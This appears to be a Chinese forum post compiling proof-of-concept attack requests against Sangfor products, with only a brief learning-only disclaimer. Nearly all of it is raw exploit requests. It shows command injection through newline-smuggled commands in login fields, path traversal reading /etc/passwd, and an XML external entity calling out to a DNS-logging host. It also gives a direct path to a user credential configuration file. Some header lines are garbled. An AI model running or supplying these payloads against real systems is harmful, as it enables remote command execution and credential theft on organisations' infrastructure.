深信服漏洞 PoC 整理
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!深信服报表系统任意命令执行漏洞版本有限制
POC
POST /rep/login HTTP/1.1
Host: URL
Cookie:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0
Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
Accept-Encoding: gzip deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers
Connection: close
Content-Type:application/x-www-form-urlencoded
Content-Length: 126
clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
深信服报表任意读取
GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:85
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
深信服数据中心管理系统 XML 实体注入漏洞
GET /src/sangforindex HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)
Accept:
text/xml,application/xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: text/xml
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: Keep-alive
Content-Length: 135
<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE root [
<!ENTITY rootas SYSTEM "http://dnslog">
]>
<xxx>
&rootas;
</xxx>
深信服应用交付系统敏感信息泄露
xxx.xxx.xxx.xxx:port/tmp/updateme/sinfor/ad/sys/sys_user.conf
深信服应用交付系统命令执行漏洞
POST /rep/login
Host:xxx.xxx.xxx.xxx:port
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
页:
[1]